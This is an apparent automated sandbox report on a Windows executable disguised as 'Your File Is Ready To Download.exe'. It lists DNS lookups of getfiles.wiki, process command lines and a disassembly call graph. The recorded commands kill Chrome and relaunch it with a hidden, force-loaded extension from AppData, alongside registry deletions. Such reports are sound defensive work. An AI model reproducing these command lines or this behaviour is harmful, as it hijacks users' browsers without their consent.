      Jan 3, 2025 19:56:58.141066074 CET192.168.2.241.1.1.10x59b0Standard query (0)getfiles.wiki65IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Jan 3, 2025 19:56:50.463033915 CET1.1.1.1192.168.2.240x9f43No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
      Jan 3, 2025 19:56:50.463033915 CET1.1.1.1192.168.2.240x9f43No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
      Jan 3, 2025 19:56:58.217159986 CET1.1.1.1192.168.2.240x1b77No error (0)getfiles.wiki185.107.56.193A (IP address)IN (0x0001)false

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:13:56:55
      Start date:03/01/2025
      Path:C:\Users\user\Desktop\Your File Is Ready To Download.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\Your File Is Ready To Download.exe"
      Imagebase:0x910000
      File size:203'120 bytes
      MD5 hash:C350EACFE1E1E28295EB961AF91E70F8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:1
      Start time:13:56:56
      Start date:03/01/2025
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" https://getfiles.wiki/welcome.php
      Imagebase:0x7ff6c5120000
      File size:3'001'952 bytes
      MD5 hash:290DF23002E9B52249B5549F0C668A86
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:2
      Start time:13:56:56
      Start date:03/01/2025
      Path:C:\Windows\SysWOW64\taskkill.exe
      Wow64 process (32bit):true
      Commandline:/IM chrome.exe
      Imagebase:0xfe0000
      File size:76'288 bytes
      MD5 hash:0696086690D7B673C64A7CAD8CD58F7D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:4
      Start time:13:56:56
      Start date:03/01/2025
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6038b0000
      File size:1'040'384 bytes
      MD5 hash:9698384842DA735D80D278A427A229AB
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:5
      Start time:13:56:56
      Start date:03/01/2025
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1744,i,7731954280138320049,15909373391771842878,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2152 /prefetch:11
      Imagebase:0x7ff6c5120000
      File size:3'001'952 bytes
      MD5 hash:290DF23002E9B52249B5549F0C668A86
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:7
      Start time:13:56:59
      Start date:03/01/2025
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\Users\user\AppData\Local\ServiceApp\apps-helper" --hide-crash-restore-bubble
      Imagebase:0x7ff6c5120000
      File size:3'001'952 bytes
      MD5 hash:290DF23002E9B52249B5549F0C668A86
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:8
      Start time:13:57:00
      Start date:03/01/2025
      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=1920,i,3844859104028223706,11650728144148366790,262144 --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11
      Imagebase:0x7ff6c5120000
      File size:3'001'952 bytes
      MD5 hash:290DF23002E9B52249B5549F0C668A86
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:13
      Start time:13:57:10
      Start date:03/01/2025
      Path:C:\Windows\SysWOW64\taskkill.exe
      Wow64 process (32bit):true
      Commandline:/F /IM chrome.exe /T
      Imagebase:0xfe0000
      File size:76'288 bytes
      MD5 hash:0696086690D7B673C64A7CAD8CD58F7D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:true

      Target ID:14
      Start time:13:57:10
      Start date:03/01/2025
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff6038b0000
      File size:1'040'384 bytes
      MD5 hash:9698384842DA735D80D278A427A229AB
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Reset < >

        Execution Graph

        Execution Coverage:7.7%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:10.5%
        Total number of Nodes:1382
        Total number of Limit Nodes:32
        execution_graph 10176 919a8b 10177 919a90 10176->10177 10181 919a9c 10176->10181 10178 919a5f 10177->10178 10177->10181 10179 912905 __close 66 API calls 10178->10179 10182 919a64 10179->10182 10184 919ae1 10181->10184 10187 91a8c2 10181->10187 10183 91289d __close 6 API calls 10182->10183 10186 919a74 10183->10186 10185 912905 __close 66 API calls 10184->10185 10184->10186 10185->10186 10194 91294e 10187->10194 10190 91a8e3 10190->10181 10191 91671c __isleadbyte_l 76 API calls 10192 91a90b 10191->10192 10202 918f16 10192->10202 10195 912961 10194->10195 10199 9129ae 10194->10199 10196 9145d4 __getptd 66 API calls 10195->10196 10197 912966 10196->10197 10198 91298e 10197->10198 10207 9161bc 10197->10207 10198->10199 10222 915a50 10198->10222 10199->10190 10199->10191 10203 91294e _LocaleUpdate::_LocaleUpdate 76 API calls 10202->10203 10204 918f29 10203->10204 10410 918d5c 10204->10410 10208 9161c8 __close 10207->10208 10209 9145d4 __getptd 66 API calls 10208->10209 10210 9161cd 10209->10210 10211 9161fb 10210->10211 10213 9161df 10210->10213 10212 9169cb __lock 66 API calls 10211->10212 10214 916202 10212->10214 10215 9145d4 __getptd 66 API calls 10213->10215 10238 91617e 10214->10238 10218 9161e4 10215->10218 10220 9161f2 __close 10218->10220 10221 91369d __amsg_exit 66 API calls 10218->10221 10220->10198 10221->10220 10223 915a5c __close 10222->10223 10224 9145d4 __getptd 66 API calls 10223->10224 10225 915a61 10224->10225 10226 9169cb __lock 66 API calls 10225->10226 10230 915a73 10225->10230 10227 915a91 10226->10227 10228 915ada 10227->10228 10231 915ac2 InterlockedIncrement 10227->10231 10232 915aa8 InterlockedDecrement 10227->10232 10406 915aeb 10228->10406 10229 915a81 __close 10229->10199 10230->10229 10234 91369d __amsg_exit 66 API calls 10230->10234 10231->10228 10232->10231 10235 915ab3 10232->10235 10234->10229 10235->10231 10236 9163b9 __crtLCMapStringA_stat 66 API calls 10235->10236 10237 915ac1 10236->10237 10237->10231 10239 916182 10238->10239 10240 9161b4 10238->10240 10239->10240 10241 916056 ___addlocaleref 8 API calls 10239->10241 10246 916226 10240->10246 10242 916195 10241->10242 10242->10240 10249 9160e5 10242->10249 10405 9168f1 LeaveCriticalSection 10246->10405 10248 91622d 10248->10218 10250 9160f6 InterlockedDecrement 10249->10250 10251 916179 10249->10251 10252 91610b InterlockedDecrement 10250->10252 10253 91610e 10250->10253 10251->10240 10263 915f0d 10251->10263 10252->10253 10254 916118 InterlockedDecrement 10253->10254 10255 91611b 10253->10255 10254->10255 10256 916125 InterlockedDecrement 10255->10256 10257 916128 10255->10257 10256->10257 10258 916132 InterlockedDecrement 10257->10258 10259 916135 10257->10259 10258->10259 10260 91614e InterlockedDecrement 10259->10260 10261 91615e InterlockedDecrement 10259->10261 10262 916169 InterlockedDecrement 10259->10262 10260->10259 10261->10259 10262->10251 10264 915f91 10263->10264 10265 915f24 10263->10265 10266 915fde 10264->10266 10267 9163b9 __crtLCMapStringA_stat 66 API calls 10264->10267 10265->10264 10275 9163b9 __crtLCMapStringA_stat 66 API calls 10265->10275 10290 915f58 10265->10290 10281 916005 10266->10281 10317 918f58 10266->10317 10269 915fb2 10267->10269 10272 9163b9 __crtLCMapStringA_stat 66 API calls 10269->10272 10271 915f79 10273 9163b9 __crtLCMapStringA_stat 66 API calls 10271->10273 10277 915fc5 10272->10277 10278 915f86 10273->10278 10274 91604a 10279 9163b9 __crtLCMapStringA_stat 66 API calls 10274->10279 10280 915f4d 10275->10280 10276 9163b9 __crtLCMapStringA_stat 66 API calls 10276->10281 10284 9163b9 __crtLCMapStringA_stat 66 API calls 10277->10284 10285 9163b9 __crtLCMapStringA_stat 66 API calls 10278->10285 10286 916050 10279->10286 10293 919132 10280->10293 10281->10274 10283 9163b9 66 API calls __crtLCMapStringA_stat 10281->10283 10282 9163b9 __crtLCMapStringA_stat 66 API calls 10288 915f6e 10282->10288 10283->10281 10289 915fd3 10284->10289 10285->10264 10286->10240 10309 9190ed 10288->10309 10292 9163b9 __crtLCMapStringA_stat 66 API calls 10289->10292 10290->10271 10290->10282 10292->10266 10294 91913f 10293->10294 10308 9191bc 10293->10308 10295 919150 10294->10295 10296 9163b9 __crtLCMapStringA_stat 66 API calls 10294->10296 10297 9163b9 __crtLCMapStringA_stat 66 API calls 10295->10297 10299 919162 10295->10299 10296->10295 10297->10299 10298 919174 10301 919186 10298->10301 10303 9163b9 __crtLCMapStringA_stat 66 API calls 10298->10303 10299->10298 10300 9163b9 __crtLCMapStringA_stat 66 API calls 10299->10300 10300->10298 10302 919198 10301->10302 10304 9163b9 __crtLCMapStringA_stat 66 API calls 10301->10304 10305 9191aa 10302->10305 10306 9163b9 __crtLCMapStringA_stat 66 API calls 10302->10306 10303->10301 10304->10302 10307 9163b9 __crtLCMapStringA_stat 66 API calls 10305->10307 10305->10308 10306->10305 10307->10308 10308->10290 10310 9190fa 10309->10310 10316 91912e 10309->10316 10311 9163b9 __crtLCMapStringA_stat 66 API calls 10310->10311 10314 91910a 10310->10314 10311->10314 10312 9163b9 __crtLCMapStringA_stat 66 API calls 10313 91911c 10312->10313 10315 9163b9 __crtLCMapStringA_stat 66 API calls 10313->10315 10313->10316 10314->10312 10314->10313 10315->10316 10316->10271 10318 918f69 10317->10318 10404 915ffe 10317->10404 10319 9163b9 __crtLCMapStringA_stat 66 API calls 10318->10319 10320 918f71 10319->10320 10321 9163b9 __crtLCMapStringA_stat 66 API calls 10320->10321 10322 918f79 10321->10322 10323 9163b9 __crtLCMapStringA_stat 66 API calls 10322->10323 10324 918f81 10323->10324 10325 9163b9 __crtLCMapStringA_stat 66 API calls 10324->10325 10326 918f89 10325->10326 10327 9163b9 __crtLCMapStringA_stat 66 API calls 10326->10327 10328 918f91 10327->10328 10329 9163b9 __crtLCMapStringA_stat 66 API calls 10328->10329 10330 918f99 10329->10330 10331 9163b9 __crtLCMapStringA_stat 66 API calls 10330->10331 10332 918fa0 10331->10332 10333 9163b9 __crtLCMapStringA_stat 66 API calls 10332->10333 10334 918fa8 10333->10334 10335 9163b9 __crtLCMapStringA_stat 66 API calls 10334->10335 10336 918fb0 10335->10336 10337 9163b9 __crtLCMapStringA_stat 66 API calls 10336->10337 10338 918fb8 10337->10338 10339 9163b9 __crtLCMapStringA_stat 66 API calls 10338->10339 10340 918fc0 10339->10340 10341 9163b9 __crtLCMapStringA_stat 66 API calls 10340->10341 10342 918fc8 10341->10342 10343 9163b9 __crtLCMapStringA_stat 66 API calls 10342->10343 10344 918fd0 10343->10344 10345 9163b9 __crtLCMapStringA_stat 66 API calls 10344->10345 10346 918fd8 10345->10346 10347 9163b9 __crtLCMapStringA_stat 66 API calls 10346->10347 10348 918fe0 10347->10348 10349 9163b9 __crtLCMapStringA_stat 66 API calls 10348->10349 10350 918fe8 10349->10350 10351 9163b9 __crtLCMapStringA_stat 66 API calls 10350->10351 10352 918ff3 10351->10352 10353 9163b9 __crtLCMapStringA_stat 66 API calls 10352->10353 10354 918ffb 10353->10354 10355 9163b9 __crtLCMapStringA_stat 66 API calls 10354->10355 10356 919003 10355->10356 10357 9163b9 __crtLCMapStringA_stat 66 API calls 10356->10357 10358 91900b 10357->10358 10359 9163b9 __crtLCMapStringA_stat 66 API calls 10358->10359 10360 919013 10359->10360 10361 9163b9 __crtLCMapStringA_stat 66 API calls 10360->10361 10362 91901b 10361->10362 10363 9163b9 __crtLCMapStringA_stat 66 API calls 10362->10363 10364 919023 10363->10364 10365 9163b9 __crtLCMapStringA_stat 66 API calls 10364->10365 10366 91902b 10365->10366 10367 9163b9 __crtLCMapStringA_stat 66 API calls 10366->10367 10368 919033 10367->10368 10369 9163b9 __crtLCMapStringA_stat 66 API calls 10368->10369 10370 91903b 10369->10370 10371 9163b9 __crtLCMapStringA_stat 66 API calls 10370->10371 10372 919043 10371->10372 10373 9163b9 __crtLCMapStringA_stat 66 API calls 10372->10373 10374 91904b 10373->10374 10375 9163b9 __crtLCMapStringA_stat 66 API calls 10374->10375 10376 919053 10375->10376 10377 9163b9 __crtLCMapStringA_stat 66 API calls 10376->10377 10378 91905b 10377->10378 10379 9163b9 __crtLCMapStringA_stat 66 API calls 10378->10379 10380 919063 10379->10380 10381 9163b9 __crtLCMapStringA_stat 66 API calls 10380->10381 10382 91906b 10381->10382 10383 9163b9 __crtLCMapStringA_stat 66 API calls 10382->10383 10384 919079 10383->10384 10385 9163b9 __crtLCMapStringA_stat 66 API calls 10384->10385 10386 919084 10385->10386 10387 9163b9 __crtLCMapStringA_stat 66 API calls 10386->10387 10388 91908f 10387->10388 10389 9163b9 __crtLCMapStringA_stat 66 API calls 10388->10389 10390 91909a 10389->10390 10391 9163b9 __crtLCMapStringA_stat 66 API calls 10390->10391 10392 9190a5 10391->10392 10393 9163b9 __crtLCMapStringA_stat 66 API calls 10392->10393 10394 9190b0 10393->10394 10395 9163b9 __crtLCMapStringA_stat 66 API calls 10394->10395 10396 9190bb 10395->10396 10397 9163b9 __crtLCMapStringA_stat 66 API calls 10396->10397 10398 9190c6 10397->10398 10399 9163b9 __crtLCMapStringA_stat 66 API calls 10398->10399 10400 9190d1 10399->10400 10401 9163b9 __crtLCMapStringA_stat 66 API calls 10400->10401 10402 9190dc 10401->10402 10403 9163b9 __crtLCMapStringA_stat 66 API calls 10402->10403 10403->10404 10404->10276 10405->10248 10409 9168f1 LeaveCriticalSection 10406->10409 10408 915af2 10408->10230 10409->10408 10411 918da8 10410->10411 10412 918d7d GetStringTypeW 10410->10412 10413 918d95 10411->10413 10415 918e8f 10411->10415 10412->10413 10414 918d9d GetLastError 10412->10414 10416 918de1 MultiByteToWideChar 10413->10416 10431 918e89 10413->10431 10414->10411 10436 91a67f GetLocaleInfoA 10415->10436 10421 918e0e 10416->10421 10416->10431 10418 91213c __crtLCMapStringA_stat 5 API calls 10419 918f14 10418->10419 10419->10190 10420 918ee0 GetStringTypeA 10424 918efb 10420->10424 10420->10431 10425 918e23 _memset __crtLCMapStringA_stat 10421->10425 10426 919635 _malloc 66 API calls 10421->10426 10422 918eb3 10422->10420 10422->10431 10423 918e5c MultiByteToWideChar 10427 918e83 10423->10427 10428 918e72 GetStringTypeW 10423->10428 10429 9163b9 __crtLCMapStringA_stat 66 API calls 10424->10429 10425->10423 10425->10431 10426->10425 10432 918952 10427->10432 10428->10427 10429->10431 10431->10418 10433 91896f 10432->10433 10434 91895e 10432->10434 10433->10431 10434->10433 10435 9163b9 __crtLCMapStringA_stat 66 API calls 10434->10435 10435->10433 10437 91a6ad ___ansicp 10436->10437 10438 91213c __crtLCMapStringA_stat 5 API calls 10437->10438 10439 91a6c6 10438->10439 10439->10422 10558 915eb6 10561 9168f1 LeaveCriticalSection 10558->10561 10560 915ebd 10561->10560 8867 912375 8904 9148dc 8867->8904 8869 912381 GetStartupInfoW 8871 9123a4 8869->8871 8905 9148aa HeapCreate 8871->8905 8873 9123f4 8907 91471d GetModuleHandleW 8873->8907 8877 912405 __RTC_Initialize 8941 91406d 8877->8941 8878 91234c _fast_error_exit 66 API calls 8878->8877 8880 912413 8881 91241f GetCommandLineW 8880->8881 9121 91369d 8880->9121 8956 914010 GetEnvironmentStringsW 8881->8956 8885 91242e 8965 913f62 GetModuleFileNameW 8885->8965 8888 912443 8971 913d30 8888->8971 8889 91369d __amsg_exit 66 API calls 8889->8888 8892 912454 8984 91375c 8892->8984 8893 91369d __amsg_exit 66 API calls 8893->8892 8895 91245b 8896 91369d __amsg_exit 66 API calls 8895->8896 8897 912466 __wwincmdln 8895->8897 8896->8897 8990 911780 8897->8990 8899 912487 8900 912495 8899->8900 9110 91390d 8899->9110 9128 913939 8900->9128 8903 91249a __close 8904->8869 8906 9123e8 8905->8906 8906->8873 9113 91234c 8906->9113 8908 914731 8907->8908 8909 914738 8907->8909 9131 91366d 8908->9131 8911 9148a0 8909->8911 8912 914742 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8909->8912 9190 914437 8911->9190 8915 91478b TlsAlloc 8912->8915 8917 9123fa 8915->8917 8918 9147d9 TlsSetValue 8915->8918 8917->8877 8917->8878 8918->8917 8919 9147ea 8918->8919 9135 913957 8919->9135 8924 91430d __encode_pointer 6 API calls 8925 91480a 8924->8925 8926 91430d __encode_pointer 6 API calls 8925->8926 8927 91481a 8926->8927 8928 91430d __encode_pointer 6 API calls 8927->8928 8929 91482a 8928->8929 9152 91684f 8929->9152 8936 914388 __decode_pointer 6 API calls 8937 91487e 8936->8937 8937->8911 8938 914885 8937->8938 9172 914474 8938->9172 8940 91488d GetCurrentThreadId 8940->8917 9517 9148dc 8941->9517 8943 914079 GetStartupInfoA 8944 9164ad __calloc_crt 66 API calls 8943->8944 8946 91409a 8944->8946 8945 9142b8 __close 8945->8880 8946->8945 8948 9164ad __calloc_crt 66 API calls 8946->8948 8954 9141ff 8946->8954 8955 914182 8946->8955 8947 914235 GetStdHandle 8947->8954 8948->8946 8949 91429a SetHandleCount 8949->8945 8950 914247 GetFileType 8950->8954 8951 9141ab GetFileType 8951->8955 8952 916ecc __ioinit InitializeCriticalSectionAndSpinCount 8952->8954 8953 916ecc __ioinit InitializeCriticalSectionAndSpinCount 8953->8955 8954->8945 8954->8947 8954->8949 8954->8950 8954->8952 8955->8945 8955->8951 8955->8953 8955->8954 8957 914021 8956->8957 8958 914025 8956->8958 8957->8885 8960 916468 __malloc_crt 66 API calls 8958->8960 8961 914046 8960->8961 8962 91404d FreeEnvironmentStringsW 8961->8962 9518 917340 8961->9518 8962->8885 8966 913f97 _wparse_cmdline 8965->8966 8967 912438 8966->8967 8968 913fd4 8966->8968 8967->8888 8967->8889 8969 916468 __malloc_crt 66 API calls 8968->8969 8970 913fda _wparse_cmdline 8969->8970 8970->8967 8972 913d48 _wcslen 8971->8972 8976 912449 8971->8976 8973 9164ad __calloc_crt 66 API calls 8972->8973 8979 913d6c _wcslen 8973->8979 8974 913dd1 8975 9163b9 __crtLCMapStringA_stat 66 API calls 8974->8975 8975->8976 8976->8892 8976->8893 8977 9164ad __calloc_crt 66 API calls 8977->8979 8978 913df7 8980 9163b9 __crtLCMapStringA_stat 66 API calls 8978->8980 8979->8974 8979->8976 8979->8977 8979->8978 8982 913db6 8979->8982 9522 9172a8 8979->9522 8980->8976 8982->8979 8983 912775 __invoke_watson 10 API calls 8982->8983 8983->8982 8985 91376a __IsNonwritableInCurrentImage 8984->8985 9531 916447 8985->9531 8987 913788 __initterm_e 8989 9137a7 __IsNonwritableInCurrentImage __initterm 8987->8989 9535 916b25 8987->9535 8989->8895 8991 91178d __write_nolock 8990->8991 9636 911050 GetModuleHandleW 8991->9636 8993 9118a5 8994 911862 8994->8993 8995 9118ab SHGetKnownFolderPath 8994->8995 9108 91187c 8994->9108 8999 9118d6 SHGetSpecialFolderPathW 8995->8999 8995->9108 8996 91213c __crtLCMapStringA_stat 5 API calls 8997 9120ea 8996->8997 8997->8899 9000 91190f 8999->9000 9664 9120f0 9000->9664 9003 911996 RegOpenKeyExW 9005 9119bd 9003->9005 9004 9119f6 RegOpenKeyExW 9008 911a21 9004->9008 9005->9004 9007 9119cc RegDeleteValueW 9005->9007 9014 9119e1 9007->9014 9015 9119e4 RegCloseKey 9007->9015 9009 911a5c RegOpenKeyExW 9008->9009 9011 911a23 9008->9011 9012 911a33 RegDeleteValueW 9008->9012 9013 911a2f 9008->9013 9016 911a83 9009->9016 9027 911a85 9009->9027 9011->9011 9018 911a47 9012->9018 9019 911a4a RegCloseKey 9012->9019 9013->9012 9017 911a31 RegDeleteValueW 9013->9017 9014->9015 9015->9004 9020 9119f3 9015->9020 9017->9018 9017->9019 9018->9019 9021 911a49 9018->9021 9019->9009 9022 911a59 9019->9022 9020->9004 9021->9021 9022->9009 9024 911a5b 9022->9024 9024->9024 9025 911ac9 9026 911ace RegOpenKeyExW 9025->9026 9030 911acd 9025->9030 9036 911af4 9026->9036 9027->9025 9028 911a93 RegDeleteKeyW RegDeleteKeyW 9027->9028 9029 911a92 RegDeleteKeyW 9027->9029 9033 911ab9 9028->9033 9034 911abc RegCloseKey 9028->9034 9029->9033 9029->9034 9030->9030 9032 911b47 RegOpenKeyExW 9046 911b72 9032->9046 9033->9034 9040 911abb 9033->9040 9034->9025 9036->9032 9037 911b06 RegDeleteValueW 9036->9037 9041 911b05 9036->9041 9038 911b1a 9037->9038 9039 911b1d RegDeleteValueW 9037->9039 9038->9039 9044 911b31 9039->9044 9045 911b34 RegCloseKey 9039->9045 9040->9040 9041->9041 9043 911ba7 9048 911bac ShellExecuteW 9043->9048 9050 911bab 9043->9050 9044->9045 9045->9032 9047 911b43 9045->9047 9046->9043 9052 911b8e RegDeleteKeyW 9046->9052 9047->9032 9049 911bcb 9048->9049 9667 911480 9049->9667 9054 911b97 9052->9054 9055 911b9a RegCloseKey 9052->9055 9054->9055 9055->9043 9056 911be0 9057 9120f0 100 API calls 9056->9057 9058 911bfc FindFirstFileW 9057->9058 9060 911c25 9058->9060 9061 9120f0 100 API calls 9060->9061 9062 911c48 GetFileAttributesW 9061->9062 9067 911c66 9062->9067 9064 911c6a 9064->9064 9065 911e09 FindNextFileW 9065->9067 9068 911e25 9065->9068 9066 9120f0 100 API calls 9066->9067 9067->9064 9067->9065 9067->9066 9070 911d54 GetFileAttributesW 9067->9070 9075 911d53 9067->9075 9069 9120f0 100 API calls 9068->9069 9068->9108 9071 911e52 9069->9071 9070->9065 9070->9075 9072 9120f0 100 API calls 9071->9072 9073 911e72 9072->9073 9706 911270 9073->9706 9075->9065 9075->9070 9077 911270 5 API calls 9078 911eb4 9077->9078 9079 911270 5 API calls 9078->9079 9080 911ed2 9079->9080 9081 911270 5 API calls 9080->9081 9082 911ef2 9081->9082 9083 911270 5 API calls 9082->9083 9084 911f10 9083->9084 9716 911330 9084->9716 9088 9120f0 100 API calls 9090 911f39 9088->9090 9089 912069 Sleep 9092 91207b 9089->9092 9090->9088 9096 911faf ShellExecuteW 9090->9096 9100 911fbf 9090->9100 9094 911270 5 API calls 9092->9094 9093 9120f0 100 API calls 9093->9100 9095 912094 9094->9095 9098 911270 5 API calls 9095->9098 9096->9090 9097 912034 GetFileAttributesW 9097->9100 9099 9120b0 Sleep 9098->9099 9106 9120c2 9099->9106 9100->9089 9100->9093 9100->9097 9101 912052 Sleep 9100->9101 9104 912055 Sleep 9100->9104 9105 912061 9100->9105 9728 9121e2 9100->9728 9101->9100 9104->9100 9105->9105 9107 911330 5 API calls 9106->9107 9107->9108 9108->8996 9109 9120da 9108->9109 9109->8899 9997 9137e1 9110->9997 9112 91391e 9112->8900 9114 91235a 9113->9114 9115 91235f 9113->9115 9117 913b50 __FF_MSGBANNER 66 API calls 9114->9117 9116 9139a5 __NMSG_WRITE 66 API calls 9115->9116 9118 912367 9116->9118 9117->9115 9119 9136f1 _malloc 3 API calls 9118->9119 9120 912371 9119->9120 9120->8873 9122 913b50 __FF_MSGBANNER 66 API calls 9121->9122 9123 9136a7 9122->9123 9124 9139a5 __NMSG_WRITE 66 API calls 9123->9124 9125 9136af 9124->9125 9126 914388 __decode_pointer 6 API calls 9125->9126 9127 91241e 9126->9127 9127->8881 9129 9137e1 _doexit 66 API calls 9128->9129 9130 913944 9129->9130 9130->8903 9132 913678 Sleep GetModuleHandleW 9131->9132 9133 913696 9132->9133 9134 91369a 9132->9134 9133->9132 9133->9134 9134->8909 9201 91437f 9135->9201 9137 91395f __init_pointers __initp_misc_winsig 9204 91683e 9137->9204 9140 91430d __encode_pointer 6 API calls 9141 91399b 9140->9141 9142 91430d TlsGetValue 9141->9142 9143 914325 9142->9143 9144 914346 GetModuleHandleW 9142->9144 9143->9144 9147 91432f TlsGetValue 9143->9147 9145 914361 GetProcAddress 9144->9145 9146 914356 9144->9146 9151 91433e 9145->9151 9148 91366d __crt_waiting_on_module_handle 2 API calls 9146->9148 9149 91433a 9147->9149 9150 91435c 9148->9150 9149->9144 9149->9151 9150->9145 9150->9151 9151->8924 9153 91685a 9152->9153 9155 914837 9153->9155 9207 916ecc 9153->9207 9155->8911 9156 914388 TlsGetValue 9155->9156 9157 9143c1 GetModuleHandleW 9156->9157 9158 9143a0 9156->9158 9160 9143d1 9157->9160 9161 9143dc GetProcAddress 9157->9161 9158->9157 9159 9143aa TlsGetValue 9158->9159 9164 9143b5 9159->9164 9162 91366d __crt_waiting_on_module_handle 2 API calls 9160->9162 9163 9143b9 9161->9163 9165 9143d7 9162->9165 9163->8911 9166 9164ad 9163->9166 9164->9157 9164->9163 9165->9161 9165->9163 9167 9164b6 9166->9167 9169 914864 9167->9169 9170 9164d4 Sleep 9167->9170 9212 9196ff 9167->9212 9169->8911 9169->8936 9171 9164e9 9170->9171 9171->9167 9171->9169 9496 9148dc 9172->9496 9174 914480 GetModuleHandleW 9175 914490 9174->9175 9176 914496 9174->9176 9177 91366d __crt_waiting_on_module_handle 2 API calls 9175->9177 9178 9144d2 9176->9178 9179 9144ae GetProcAddress GetProcAddress 9176->9179 9177->9176 9180 9169cb __lock 62 API calls 9178->9180 9179->9178 9181 9144f1 InterlockedIncrement 9180->9181 9497 914549 9181->9497 9184 9169cb __lock 62 API calls 9185 914512 9184->9185 9500 916056 InterlockedIncrement 9185->9500 9187 914530 9512 914552 9187->9512 9189 91453d __close 9189->8940 9191 914441 9190->9191 9192 91444d 9190->9192 9193 914388 __decode_pointer 6 API calls 9191->9193 9194 914461 TlsFree 9192->9194 9195 91446f 9192->9195 9193->9192 9194->9195 9196 9168b6 DeleteCriticalSection 9195->9196 9197 9168ce 9195->9197 9198 9163b9 __crtLCMapStringA_stat 66 API calls 9196->9198 9199 9168e0 DeleteCriticalSection 9197->9199 9200 9168ee 9197->9200 9198->9195 9199->9197 9200->8917 9202 91430d __encode_pointer 6 API calls 9201->9202 9203 914386 9202->9203 9203->9137 9205 91430d __encode_pointer 6 API calls 9204->9205 9206 913991 9205->9206 9206->9140 9211 9148dc 9207->9211 9209 916ed8 InitializeCriticalSectionAndSpinCount 9210 916f1c __close 9209->9210 9210->9153 9211->9209 9213 91970b __close 9212->9213 9214 919742 _memset 9213->9214 9215 919723 9213->9215 9219 9197b4 HeapAlloc 9214->9219 9222 919738 __close 9214->9222 9231 9169cb 9214->9231 9238 917e84 9214->9238 9244 9197fb 9214->9244 9247 916f3b 9214->9247 9225 912905 9215->9225 9219->9214 9222->9167 9250 91455b GetLastError 9225->9250 9227 91290a 9228 91289d 9227->9228 9229 914388 __decode_pointer 6 API calls 9228->9229 9230 9128ad __invoke_watson 9229->9230 9232 9169e0 9231->9232 9233 9169f3 EnterCriticalSection 9231->9233 9292 916908 9232->9292 9233->9214 9235 9169e6 9235->9233 9236 91369d __amsg_exit 65 API calls 9235->9236 9237 9169f2 9236->9237 9237->9233 9239 917eb2 9238->9239 9240 917f54 9239->9240 9241 917f4b 9239->9241 9484 9179eb 9239->9484 9240->9214 9241->9240 9491 917a9b 9241->9491 9495 9168f1 LeaveCriticalSection 9244->9495 9246 919802 9246->9214 9248 914388 __decode_pointer 6 API calls 9247->9248 9249 916f4b 9248->9249 9249->9214 9264 914403 TlsGetValue 9250->9264 9253 9145c8 SetLastError 9253->9227 9254 9164ad __calloc_crt 63 API calls 9255 914586 9254->9255 9255->9253 9256 914388 __decode_pointer 6 API calls 9255->9256 9257 9145a0 9256->9257 9258 9145a7 9257->9258 9259 9145bf 9257->9259 9260 914474 __mtinit 63 API calls 9258->9260 9269 9163b9 9259->9269 9262 9145af GetCurrentThreadId 9260->9262 9262->9253 9263 9145c5 9263->9253 9265 914433 9264->9265 9266 914418 9264->9266 9265->9253 9265->9254 9267 914388 __decode_pointer 6 API calls 9266->9267 9268 914423 TlsSetValue 9267->9268 9268->9265 9271 9163c5 __close 9269->9271 9270 91643e __dosmaperr __close 9270->9263 9271->9270 9273 9169cb __lock 64 API calls 9271->9273 9281 916404 9271->9281 9272 916419 HeapFree 9272->9270 9274 91642b 9272->9274 9278 9163dc ___sbh_find_block 9273->9278 9275 912905 __close 64 API calls 9274->9275 9276 916430 GetLastError 9275->9276 9276->9270 9277 9163f6 9288 91640f 9277->9288 9278->9277 9282 9176d5 9278->9282 9281->9270 9281->9272 